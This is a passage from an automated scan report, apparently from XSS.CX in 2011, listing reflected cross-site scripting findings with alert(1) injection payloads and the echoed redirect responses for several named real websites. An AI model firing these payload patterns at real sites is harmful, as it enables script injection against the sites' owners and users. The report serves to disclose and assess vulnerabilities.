Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1">https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1</A> ...[SNIP]...
2.110. http://www.opinionoutpost.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.opinionoutpost.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c079"><script>alert(1)</script>8e52f6bccae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 This object has moved Content-type: text/html Content-Length: 261 Location: https://www.opinionoutpost.com:443/?8c079"><script>alert(1)</script>8e52f6bccae=1
<html><head><title>302 - This object has moved</title></head> <body> <h1>302: This object has moved</h1> <b><p>Please click <A HREF="https://www.opinionoutpost.com:443/?8c079"><script>alert(1)</script>8e52f6bccae=1"> ...[SNIP]...
2.111. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.radioshackwireless.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52414"><script>alert(1)</script>50f07126836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://radioshackwireless.com/?52414"><script>alert(1)</script>50f07126836=1">http://radioshackwireless.com/?52414"><scri ...[SNIP]...
2.112. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.radioshackwireless.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>694eb393332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1">http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1</a> ...[SNIP]...
2.113. http://www.yadro.ru/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.yadro.ru
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe25"><script>alert(1)</script>17a24794658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><head><title>[302] Moved Temporarily</title></head> <body><h3>Moved Temporarily</h3> This document has moved <a href="http://members.yadro.ru/?8fe25"><script>alert(1)</script>17a24794658=1">here ...[SNIP]...
Report generated by XSS.CX at Sat Apr 02 11:20:54 CDT 2011.